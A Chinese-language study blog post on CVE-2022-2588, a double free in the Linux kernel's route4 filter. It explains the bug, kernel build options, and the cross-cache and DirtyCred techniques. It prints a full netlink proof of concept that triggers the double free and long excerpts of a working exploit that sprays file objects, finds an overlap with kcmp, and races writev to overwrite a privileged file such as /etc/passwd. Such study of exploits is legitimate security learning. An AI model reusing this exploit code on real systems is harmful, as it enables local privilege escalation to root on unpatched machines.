			for (pfp = rtnl_dereference(*fp); pfp;
			     fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
				if (pfp == fold) {
					rcu_assign_pointer(*fp, fold->next);
					break;
				}
			}
		}
	}

	route4_reset_fastmap(head);
	*arg = f;
	if (fold) {
		tcf_unbind_filter(tp, &fold->res);
		tcf_exts_get_net(&fold->exts);
		tcf_queue_work(&fold->rwork, route4_delete_filter_work);
	}
	return 0;

errout:
	if (f)
		tcf_exts_destroy(&f->exts);
	kfree(f);
	return err;
}

漏洞原理

关键文件就是出在了route4_change中把旧的过滤器即struct route4_filter结构体从哈希桶中移出来，然后把他kfree掉，但是看关键代码,首先使用if判断这个这个fold是否存在以及他的handle是否存在，还要满足f->handle != fold->handle才进入循环里从哈希桶中脱链，如果条件不满足那就进入下一个判断，这个判断只是判断fold是否存在，如果存在的话就表示旧的过滤器存在，然后把他kfree掉。

可见由于脱链时判断旧过滤器是否存在和kfree时判断旧过滤器是否存在的判断依据不一样，这就会导致歧义的出现。假设这样一种情况，旧过滤器的handle为0，就会导致这个旧的过滤器不会被脱链但是会被kfree。这就可以造成doublefree.

if (fold && fold->handle && f->handle != fold->handle) {
		th = to_hash(fold->handle);
		h = from_hash(fold->handle >> 16);
		b = rtnl_dereference(head->table[th]);
		if (b) {
			fp = &b->ht[h];
			for (pfp = rtnl_dereference(*fp); pfp;
			     fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
				if (pfp == fold) {
					rcu_assign_pointer(*fp, fold->next);
					break;
				}
			}
		}
	}

	route4_reset_fastmap(head);
	*arg = f;
	if (fold) {
		tcf_unbind_filter(tp, &fold->res);
		tcf_exts_get_net(&fold->exts);
		tcf_queue_work(&fold->rwork, route4_delete_filter_work);
	}

漏洞复现

环境搭建

首先是得把漏洞模块编译进入内核，其次还要勾上几个编译选项,这些编译选项最好不要直接在.config中进行修改，因为有些编译选项依赖于其他的编译选项，所以最好是在make menuconfig中进行修改，想要查找某一个编译选项在什么位置可以使用menuconifg的快捷键/进行搜索。

CONFIG_BINFMT_MISC=y
CONFIG_USER_NS=y
CONFIG_NET_CLS_ROUTE4=y
CONFIG_DUMMY=y CONFIG_NET_SCH_QFQ=y
CONFIG_NET_CLS_ACT=y CONFIG_NET_CLS_BASIC=y
CONFIG_NET_SCH_SFQ=y
CONFIG_NET_EMATCH_META=y
CONFIG_E1000=y CONFIG_E1000E=y

poc学习

poc如下

#define _GNU_SOURCE
#include <sched.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <linux/pkt_sched.h>

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <stdlib.h>
void hexdump(const void *data, size_t size)
{
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i)
    {
        dprintf(2, "%02X ", ((unsigned char *)data)[i]);
        if (((unsigned char *)data)[i] >= ' ' && ((unsigned char *)data)[i] <= '~')
        {
            ascii[i % 16] = ((unsigned char *)data)[i];
        } else
        {
            ascii[i % 16] = '.';
        }
        if ((i + 1) % 8 == 0 || i + 1 == size)
        {
            dprintf(2, " ");
            if ((i + 1) % 16 == 0)
            {
                dprintf(2, "|  %s \n", ascii);
            }
            else if (i + 1 == size)
            {
                ascii[(i + 1) % 16] = '\0';
                if ((i + 1) % 16 <= 8)
                {
                    dprintf(2, " ");
                }
                for (j = (i + 1) % 16; j < 16; ++j)
                {
                    dprintf(2, "   ");
                }
                dprintf(2, "|  %s \n", ascii);
            }
        }
    }
}


static char newlink[] = {
        /* len */
        56, 0x00, 0x00, 0x00,
        /* type = NEWLINK */
        16, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        0x01, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_family */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* ifi_flags */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_change */
        0x00, 0x00, 0x00, 0x00,
        /* nla_len, nla_type */
        0x08, 0x00, 0x03, 0x00,
        /* string */
        'e', 't', '2', 0,
        /* nla_len, nla_type */
        16, 0x00, 18, 0x00,
        /* nested nla_len, nla_type */
        10, 0x00, 0x01, 0x00,
        'd', 'u', 'm', 'm',
        'y', 0x00, 0x00, 0x00,
};

static char dellink[] = {
        /* len */
        40, 0x00, 0x00, 0x00,
        /* type = DELLINK */
        17, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        0x01, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_family */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_ifindex */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_flags */
        0x00, 0x00, 0x00, 0x00,
        /* ifi_change */
        0x00, 0x00, 0x00, 0x00,
        /* nla_len, nla_type */
        0x08, 0x00, 0x03, 0x00,
        /* string */
        'e', 't', '2', 0,
};

static char tfilter[] = {
        /* len */
        68, 0x00, 0x00, 0x00,
        /* type = NEWTFILTER */
        44, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        0x41, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_family */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* tcm_handle */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_parent */
        0x00, 0x00, 0x01, 0x00,
        /* tcm_info = protocol/prio */
        0x01, 0x00, 0x01, 0x00,
        /* nla_len, nla_type */
        0x0a, 0x00, 0x01, 0x00,
        /* string */
        'r', 'o', 'u', 't',
        'e', 0, 0, 0,
        /* OPTIONS */
        0x14, 0x00, 0x02, 0x00,
        /* ROUTE4_TO */
        0x08, 0x00, 0x02, 0x00,
        0x00, 0x00, 0x00, 0x00,
        /* ROUTE4_FROM */
        0x08, 0x00, 0x03, 0x00,
        0x00, 0x00, 0x00, 0x00,
};

static char ntfilter[] = {
        /* len */
        56, 0x00, 0x00, 0x00,
        /* type = NEWTFILTER */
        44, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE */
        /* 0x200 = NLM_F_EXCL */
        0x41, 0x04,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_family */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* tcm_handle */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_parent */
        0x00, 0x00, 0x01, 0x00,
        /* tcm_info = protocol/prio */
        0x01, 0x00, 0x01, 0x00,
        /* OPTIONS */
        0x14, 0x00, 0x02, 0x00,
        /* ROUTE4_TO */
        0x08, 0x00, 0x02, 0x00,
        0x01, 0x00, 0x00, 0x00,
        /* ROUTE4_FROM */
        0x08, 0x00, 0x03, 0x00,
        0x00, 0x00, 0x00, 0x00,
};


static char linkcmd[] = {
        /* len */
        44, 0x00, 0x00, 0x00,
        /* type = NEWQDISC */
        36, 0x00,
        /* flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_REPLACE */
        0x01, 0x05,
        /* seq */
        0x01, 0x00, 0x00, 0x00,
        /* pid */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_family */
        0x00, 0x00, 0x00, 0x00,
        /* tcm_ifindex */
        0x30, 0x00, 0x00, 0x00,
        /* tcm_handle */
        0x00, 0x00, 0x01, 0x00,
        /* tcm_parent */
        0xff, 0xff, 0xff, 0xff,
        /* tcm_info = protocol/prio */
        0x00, 0x00, 0x00, 0x00,
        /* nla_len, nla_type */
        0x04, 0x00, 0x01, 0x00,
        /* string */
};

int build_qfq(char *buf)
{
        char *qopt;
        short *tlen;
        char *qdisc = "qfq";

        short *optlen;
        short *opttype;

        tlen = buf;

        memset(buf, 0, sizeof(buf));
        memcpy(buf, linkcmd, sizeof(linkcmd));
        strcpy(buf+sizeof(linkcmd), qdisc);
        *tlen = sizeof(linkcmd) + strlen(qdisc) + 1;
        buf[36] = strlen(qdisc)+5;

        qopt = buf + *tlen;
        /* nla_len, nla_type */
        /* 24, 0x00, 0x02, 0x00, */
        optlen = qopt;
        opttype = optlen + 1;
        *opttype = 0x2;

        *optlen = 4;

        *tlen += *optlen;

        return *tlen;
}

int main(int argc, char **argv)
{
        int s;
        pid_t p;
        int *error;
        char buf[4096]={0};
        int tlen;
        char buf2[4096]={0};
        error = (int *) (buf + 16);

        unsigned long count = 1;
        int i;

        unshare(CLONE_NEWUSER|CLONE_NEWNET);
        tlen = build_qfq(buf);
        s = socket(AF_NETLINK, SOCK_RAW|SOCK_NONBLOCK, NETLINK_ROUTE);
        perror("socket:");
        printf("s: %d\n",s);
        printf("newlink:\n");
        hexdump(newlink,0x100);
        write(s, newlink, sizeof(newlink));
        read(s, buf2, sizeof(buf));
        perror("NLMSG_ERROR");
        printf("err:%d\n", *error);
        printf("msg type:%d\n",*(short *)(buf + 4));

        sleep(1);
        printf("qdisc:\n");
        hexdump(buf,0x100);
        write(s, buf, tlen);
        read(s, buf, sizeof(buf));
        printf("err:%d\n", *error);
        sleep(1);
        printf("tfilter:\n");
        hexdump(tfilter,0x100);

        write(s, tfilter, sizeof(tfilter));
        read(s, buf, sizeof(buf));
        printf("err:%d\n", *error);
        sleep(1);


        printf("ntfilter:\n");
        hexdump(ntfilter,0x100);

        write(s, ntfilter, sizeof(ntfilter));
        read(s, buf, sizeof(buf));
        printf("Err:%d\n", *error);
        sleep(1);

        printf("dellink:\n");
        hexdump(dellink,0x100);

        write(s, dellink, sizeof(dellink));
        read(s, buf, sizeof(buf));
        printf("err:%d\n", *error);


        return 0;
}

poc写的比较清晰的，首先是socket(AF_NETLINK, SOCK_RAW|SOCK_NONBLOCK, NETLINK_ROUTE);,然后发了五次包，第一第二次好似是设置网络设备的，比较重要的是第三第四和四五次发包，第三次发包是创建了一个handle为0的route4_filter，第四次发包还是传入一个handle为0的route4_filer，这样第一次创建的route4_filer就被释放当时没有脱链，然后第五次发包是删除第一次发包创建的link,这样就顺带着把他的route4_filer也给free掉了，这样就构成了一个doublefree了。而且不止doubelfree了route4_filter，还doublefree了一个指针数组，前一个的obj的size为kmalloc-192,后一个是kmalloc-256

触发了doublefree但是内核并没有直接崩溃。

漏洞利用原理

感觉挺有意思的，也学到了很多东西，漏洞利用主要分为两部分，分别是cross cache attack和dirty cred，下面分别就这两点详细展开学习。

cross cache attack

他的主要作用就是绕过内核的slab隔离。在没有看n1ctf那道内核题目之前还不是能完全理解这种攻击思路的强大，现在再来看的是发现简直好用的一。

内核是从kmem_cahches中申请不同大小的obj的，而keme_caches即kmalloc slab allocation则是基于buddy allocator的，buddy allocator就是伙伴系统，当kmalloc cache上没有足够的obj的时候，就会向buddy allocator申请order-n page,具体会调用 new_slab() -> allocate_slab() -> alloc_slab_page() 向 buddy allocator 申请页。

/*
 * Slab allocation and freeing
 */
static inline struct slab *alloc_slab_page(gfp_t flags, int node,
        struct kmem_cache_order_objects oo)
{
    struct folio *folio;
    struct slab *slab;
    unsigned int order = oo_order(oo);      // order = kmem_cache->oo.x >> 16

    if (node == NUMA_NO_NODE)
        folio = (struct folio *)alloc_pages(flags, order);
    else
        folio = (struct folio *)__alloc_pages_node(node, flags, order);

    if (!folio)
        return NULL;

    slab = folio_slab(folio);
    __folio_set_slab(folio);
    if (page_is_pfmemalloc(folio_page(folio, 0)))
        slab_set_pfmemalloc(slab);

    return slab;
}

其中order-n中的n到底是多少就看这个slab的类型了，可以通过cat /proc/slabinfo快速知道,我查看我自己ubuntu16的cred的slab,发现要要是用伙伴系统中的order-2，也就是一次向伙伴系统中直接申请两个连续的页面用于cred的slab。

1
2
3

➜  ~ sudo cat /proc/slabinfo | grep cred
cred_jar            8316   8316    192   42    2 : tunables    0    0    0 : slabdata    198    198      0

buddy allocator 为每个 order-n page 保存着一个 FIFO queue 数组，order-n page 表示 2^n个连续页的内存。当你释放chunk后导致slab全部空闲时，slab allocator 就会将页还给 buddy allocator。
slab对应的order由很多因素决定，如 slab chunk 大小、系统定义、内核编译等，最简单的方法是查看 /proc/slabinfo。
如果所申请的 order-n page 队列为空，则将 order-n+1 的页一分为二，一半返回给申请者，一半保存在 order-n 中；如果1个page返回给 buddy allocator，且其对应的 buddy page 也在同一队列中，则整合后放在下一order的page队列中。

cross cache attack原理攻击的整体思路是，当一个slab 页面被全部释放的时候会被回收，这时被回收的页面是可以被其他种类的slab使用的这样就可以跨slab种类来进行利用，如Zhenpeng Lin 的ppt中演示的：

假定我们有一个非法释放漏洞(或double free)，但只能释放普通slab 中的堆块：

1.首先喷射一堆该大小的普通堆块，这样会消耗一大堆slab 页面。我们的double free目标指针指向其中一个堆块，先将其释放
2.然后将喷射的一大堆普通堆块都释放掉，这样double free目标堆块所在slab 页面中的所有堆块(绝大概率)会被都释放掉，该slab 页面为空，会被系统回收
3.这时喷射一大堆filp / 其他slab 类型的堆块，这样目标指针所在页面大概率会被filp 类型slab或其他目标类型slab重新申请到吗，并且目标指针(double free漏洞指针)指向其中一个struct file结构体
4.使用漏洞的第二次释放能力，该struct file结构体被非法释放

dirty cred

struct file

很有意思的一个攻击思路。主要的思路就是利用高凭证替换低凭证。而凭证一般就是cred和file,下面主要探讨在doublefree情况下如何进行凭证替换。

file结构体是打开一个文件时就会创建的一个结构体。

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
	const struct file_operations	*f_op;

	/*
	 * Protects f_ep, f_flags.
	 * Must not be taken from IRQ context.
	 */
	spinlock_t		f_lock;
	enum rw_hint		f_write_hint;
	atomic_long_t		f_count;
	unsigned int 		f_flags;
	fmode_t			f_mode; //读写权限
	struct mutex		f_pos_lock;
	loff_t			f_pos;
	struct fown_struct	f_owner;
	const struct cred	*f_cred;
	struct file_ra_state	f_ra;

	u64			f_version;
#ifdef CONFIG_SECURITY
	void			*f_security;
#endif
	/* needed for tty driver, and maybe others */
	void			*private_data;

#ifdef CONFIG_EPOLL
	/* Used by fs/eventpoll.c to link all the hooks to this file */
	struct hlist_head	*f_ep;
#endif /* #ifdef CONFIG_EPOLL */
	struct address_space	*f_mapping;
	errseq_t		f_wb_err;
	errseq_t		f_sb_err; /* for syncfs */
} __randomize_layout
  __attribute__((aligned(4)));	/* lest something weird decides that 2 is OK */

struct file_handle {
	__u32 handle_bytes;
	int handle_type;
	/* file identifier */
	unsigned char f_handle[];
};

下面是介绍dirty cred的论文中提到的doublefree情况下的利用过程，但我觉得其实没必要这么麻烦的，如果只是高凭证替换低凭证的话，假如ptr1拥有doublefree,那先把ptr1给free一次，然后让低凭证申请到这个obj,就记作ptr2,然后再free一次ptr1,就把低凭证也给free掉了，接着再堆喷低凭证,再次申请到ptr2指向的内存，记作ptr3,这样ptr2和ptr3就指向了桶一块低凭证struct file了，然后通过系统调用kcmp来得知ptr2和ptr3指向同一个struct file(因为是堆喷)，然后释放低凭证的struct file就能替换成高凭证了。

哦我懂了，下面的方法其实更加通用，因为如果能doublefree的话可能obj的大小不等于struct file的大小，所以可能出现不对齐的现象，所以需要两个ptr指向同一个obj了。上述方法只适用于刚好对齐。

方法：一般 Double-Free 发生在通用cache中，而内核凭证位于 dedicated cache 中，所以这里需要进行 cross-cache 内存布局。内核会回收未使用的内存页，然后分配给其他需要更多空间的cache。

a-d：两次触发DF，获得2个指向同一漏洞对象的悬垂指针（ptr1' / ptr2'）；
e：将该通用cache的内存页全部释放归还给页管理器，这样该内存页就可以分配给 dedicated cache （存放凭证对象）；
f：分配大量凭证对象（特殊cache）占据漏洞对象对应的空闲块，现在有3个指针指向该内存块了（2个悬垂指针和一个victim对象中的凭证指针，悬垂指针可能未对齐，指向凭证对象的内部）；
g：利用其中1个悬垂指针（ptr2'）释放凭证对象，创造空洞；
h：分配新的低权限凭证对象占据该位置；
剩余1个悬垂指针（ptr1'）指向低权限凭证对象，再次释放后就能用高权限凭证对象替换低权限凭证对象了。

到目前为止已经能凭证替换了，现在就得利用凭证替换来完成对不可写文件的写入了，在老版本4.13以前使用writev向某个文件中写入内容时逻辑时这样的

进行访问权限校验(是否可写)
从用户空间获取写入内容
实际写入操作

可以看出在验证完权限和实际写入操作之间还有一步操作，这就可以形成条件竞争了，只要验证完可写权限之后就通过堵塞卡在第二步，然后替换成高凭证。再写入的时候就往不可写文件里写入内容了。

d按时这种办法已经是昨日黄花了，在4.13版本以后writev的逻辑就成这样了

从用户空间获取写入内容
进行访问权限校验(是否可写)
实际写入操作

所以在新版本就没办法利用老办法堵塞增大时间窗(从检查权限到真正操作之间的时间)了。但是增大时间窗还是有的，这就利用了文件的innode锁了。

在已经有一个进程对一个文件进行写入操作的时候，会给文件inode上锁，其他向该文件进行写入的进程需要等待上一个进程写入完成解锁。所以就可以有这样的利用了,这样同样可以增大时间窗。

先存在一个进程向一个可写文件写入大量内容，inode锁会锁住较长时间
第二个进程尝试向该文件写入”打算写入/etc/passwd等特权文件的内容”
第三个进程利用漏洞替换file结构体

到这里对struct file的攻击就已经闭环了。

struct cred

对于file类型凭据我们可以使用普通用户可读特权用户可写的/etc/passwd来进行操作，普通用户就可以喷射大量目标用于攻击。但特权的struct cred就没那么容易了。可以通过：

执行大量suid 程序，如sudo(但大部分情况下并没有这个权限)
使用kernel thread，kernel 自己创建的任务是特权任务，我们可以利用一些内核接口控制内核启动一堆kernel thread：

利用workqueue
利用usermode helper

reading exp

终于到了阅读exp的阶段了，距离写下这篇文章的第一行似乎已经过了两周了。。。令人感叹。

进程A，随时准备喷射/etc/passwd文件

if (fork() == 0) {
// 12. Thread 3 - spray 4096*2 priviledged `file` objects to replace unprivileged `file` (wait pipe_file_spray[0])
    adjust_rlimit();
    int spray_num = 0;
    if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))   // use pipe_file_spray to notify
      err(1, "[-] read file spray");

    printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\n", target);
    spray_num = 4096;
    if (fork() == 0) {  // spray 4096 `file` (parent-process)
      for (int i = 0; i < spray_num; i++) {
        pin_on_cpu(i % cpu_cores);
        open(target, 0);
      }
      while (1) {sleep(10000);}
    }

下面是进程B的代码，但是在进程B执行之前得等进程C执行完，进程C就是堆喷一堆struct file来耗尽file slab中的空闲object，进程B就是干了一件事，堆喷很多的route4_filter ,然后把他释放掉，但是它申请的handler都不为0.所以只起了一个耗尽通用slab的obj的作用，等后面全部free的时候就会把对应页交给伙伴系统了。

但我其实不是很能理解为什么要设置user namespace。

setup_namespace();
      pin_on_cpu(0);
      int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
      assert(sprayfd != -1);
      add_qdisc(sprayfd);
// 2-1. prepare payload
      char msg[0x10] = {};
      char payload[256] = {};
      memset(payload + 0x10, 'A', 256 - 0x10);

      if (read(pipe_defrag[0], msg, 2) != 2)
        err(1, "[-] failed read defrag");

  // if the exploit keeps failing, please tune the middle and end
      int middle = 38;       // 38
      int end = middle + 40; // 40
// 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
      printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\n");
      for (int i = 0; i < middle; i++)
        add_tc_basic(sprayfd, i + 1, payload, 193, 32);

      add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
      add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
      add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
      if (write(pipe_child[1], "OK", 2) != 2)
        err(1, "[-] write to parent\n");
// 4. spray more filters in kmalloc-192 & kmalloc-256
      if (read(pipe_parent[0], msg, 2) != 2)
        err(1, "[-] read from parent");
      // add_tc_basic(sprayfd, middle+2, payload, 129, 32);

      // prepare another part for cross cache
      printf("[4] spray kmalloc-192 & kmalloc-256\n");
      for (int i = middle + 2; i < end; i++)
        add_tc_basic(sprayfd, i + 1, payload, 193, 32);
// 5. free (end-24)*32 kmalloc-192 & kmalloc-256
      printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\n");
      for (int i = 1; i < end - 24; i++) {
        // prevent double free of 192 and being reclaimed by others
        if (i == middle || i == middle + 1)
          continue;
        delete_tc_basic(sprayfd, i + 1);
      }
      if (write(pipe_child[1], "OK", 2) != 2)
        err(1, "[-] write to parent\n");
// 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
      if (read(pipe_parent[0], msg, 2) != 2)
        err(1, "[-] read from parent");
      // if (cpu_cores == 1) sleep(1);
      printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\n");
      delete_tc_basic(sprayfd, middle + 2);
      delete_tc_basic(sprayfd, middle + 3);
      delete_tc_basic(sprayfd, 1);
      for (int i = middle + 2; i < end; i++)
        delete_tc_basic(sprayfd, i + 1);
      //getchar();
      if (write(pipe_child[1], "OK", 2) != 2)
        err(1, "[-] write to parent\n");
      while (1) {sleep(1000);}
    }

进程D是关键进程，首先确定已经可以doublefree了，然后喷射一堆低凭证file,接着第一次kfree大小为0x100的obj,然后喷射一堆低凭证file拿到刚free的obj,接着doublefree这个obj,然后再喷射低凭证file,这样就有两个文件描述符指向同一个file而且这个file的f_count为1，接着开启三个线程，替换第凭证为高凭证，前面我已经说过过程了，就不赘述了.

void *slow_write() {
  printf("[11-1] start slow write\n");
  clock_t start, end;
  int fd = open("./uaf", 1);
  if (fd < 0) {
    perror("[-] error open uaf file");
    exit(-1);
  }

  unsigned long int addr = 0x30000000;
  int offset;
  for (offset = 0; offset < 0x80000 / 20; offset++) {     // mmap space [0x30000000, 0x30000000 + 0x1000 * 0x80000 / 20]
    void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
                   PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    if (r < 0)
      printf("[-] allocate failed at 0x%x\n", offset);
  }
  assert(offset > 0);

  void *mem = (void *)(addr);
  memcpy(mem, "hhhhh", 5);
  struct iovec iov[20];
  for (int i = 0; i < 20; i++) { // write plenty of data (0x80000 * 0x1000 = 0x80 000 000 = 2GB)
    iov[i].iov_base = mem;
    iov[i].iov_len = offset * 0x1000;
  }

  run_write = 1;    // notifiy thread 2 (unprivileged `file`) begin to write evil data
  start = clock();

  if (writev(fd, iov, 20) < 0)
    perror("slow write");
  end = clock();
  double spent = (double)(end - start) / CLOCKS_PER_SEC;
  printf("[*] write done, spent %f s\n", spent);
  run_write = 0;
}
// write_cmd() —— thread 2: write evil data to the privileged file
void *write_cmd() {
  struct iovec iov = {.iov_base = content, .iov_len = strlen(content)};

  while (!run_write) {}  // wait for thread 1 to prepare write
  printf("[11-2] write evil data after the slow write\n");
  run_spray = 1;
  if (writev(overlap_a, &iov, 1) < 0)
    printf("[-] failed to write\n");
}

void exploit() {
  char msg[0x10] = {};
  struct rlimit old_lim, lim, new_lim;

  // Get old limits
  if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
    printf("Old limits -> soft limit= %ld \t"
           " hard limit= %ld \n",
           old_lim.rlim_cur, old_lim.rlim_max);
  pin_on_cpu(0);
  printf("[*] starting exploit, num of cores: %d\n", cpu_cores);
  // open & setup the socket
  sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
  assert(sockfd != -1);
  add_qdisc(sockfd);
// 3. allocate a route4_filter (vulnerable object)
  if (read(pipe_child[0], msg, 2) != 2)
    err(1, "[-] read from parent");
  printf("[3] allocate the vulnerable filter\n");
  add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);  // handle = 0

  if (write(pipe_parent[1], "OK", 2) != 2)
    err(1, "[-] write to child");
// 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
  if (read(pipe_child[0], msg, 2) != 2)
    err(1, "[-] read from parent");

  // free the object, to free the slab
  printf("[6] 1st freed the filter object\n");
  // getchar();
  add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);         // handle = 0

  // wait for the vulnerable object being freed
  usleep(500 * 1000);
  if (write(pipe_parent[1], "OK", 2) != 2)
    err(1, "[-] write to child");
// 8. spray 4000 unprivileged `file`
  if (read(pipe_child[0], msg, 2) != 2)
    err(1, "[-] read from parent");

  usleep(1000 * 1000);
  printf("[8] spray 4000 uprivileged `file`\n");
  for (int i = 0; i < spray_num_1; i++) {
    pin_on_cpu(i % cpu_cores);
    fds[i] = open("./data2", 1);
    assert(fds[i] > 0);
  }
  // printf("pause before 2nd free\n");
  // getchar();
// 9. 2nd free route4_filter, which will free the file
  printf("[9] 2nd free the filter object\n");
  add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);         // handle = 0
  printf("pause after 2nd free\n");
  // getchar();
  // sleep(10000);
  usleep(1000 * 100);   // should not sleep too long, otherwise file might be claimed by others

// 10. spray 5000 unprivileged `file` & find the overlapped file
  printf("[10] spraying 5000 unprivileged `file`\n");
  for (int i = 0; i < spray_num_2; i++) {
    pin_on_cpu(i % cpu_cores);
    fd_2[i] = open("./uaf", 1);
    assert(fd_2[i] > 0);
    for (int j = 0; j < spray_num_1; j++) {
// 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
      if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
      {
        printf("[10-1] found overlapped file, id : %d, %d\n", i, j);
        overlap_a = fds[j];
        overlap_b = fd_2[i];
// 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
        printf("[11] start 2 threads compete to write\n");
        pthread_t pid, pid2;
        pthread_create(&pid, NULL, slow_write, NULL);
        pthread_create(&pid2, NULL, write_cmd, NULL);

        while (!run_spray) {}
// 12. spray privileged `file` object
        close(overlap_a);     // ??????????? why release twice ???????????
        close(overlap_b);

        usleep(1000 * 100);
        int spray_num = 4096;
        write(pipe_file_spray[0][1], &spray_num, sizeof(int));
        if (read(pipe_file_spray[1][0], &msg, 2) != 2)
          err(1, "[-] read from file spray");
        overlapped = true;
      }
    }
    if (overlapped)
      break;
  }
// 13. finish exploitation
  sleep(3);
  while (run_write) {sleep(1);}
  printf("[13] check whether we overwrite the privileged file\n");
  if (!overlapped) {
    printf("[-] no overlap found :(...\n");
    write(pipe_main[1], "\xff", 1);
  } else {
    int xx = open(target, 0);
    char buf[0x100] = {};
    // check if user (hi) in the passwd
    read(xx, buf, 0x30);
    if (!strncmp(buf, "hi", 2))
      write(pipe_main[1], "\x00", 1);
    else {
      printf("[-] not successful : %s\n", buf);
      write(pipe_main[1], "\xff", 1);
    }
  }
  while (1) {sleep(1000);}
}

具体过程可以看这两张图

调试了半个晚上终于把exp中关于file结构体引用计数的问题解决了，在一个进程中，主线程和所有的支线程共用一个struct files_struct结构体，所以在创建线程的时候并不会像创建子进程一样给所有的file的结构体的引用计数f_count加一，但是只要在子线程中使用了这个文件描述符（注意是使用，只有使用了才会加一，使用完还会减一），就会给对应的file的f_count加一，表示这个结构体正在被使用，所以在主线程close这个文件描述符之后，对应的file并没有被kfree掉，而是引用计数减一，但是这个file指针是在主线程中被清零的。而在某个地方肯定还记录着这个file的指针，以便后续kfree。

但比较奇怪的是一个进程只有线程的时候，就算使用这个文件描述符，文件描述符对应的file的引用计数还是没有变的。

这是支线程使用write正在写入时file的样子，可见f_count为2.

当开启了支线程但是没有使用文件描述符时file的样子，可见f_count为1

总结

这个cve的学习总算告一段落了，除了设置user namespace没怎么搞懂以外其他基本都明白了，也用exp调试打通了自己搭的环境，总的来说确实学到了好多。尤其是cross cache和drity cred，还深入的了解了文件描述符到底是个什么东东了。

study

cve-2022-2588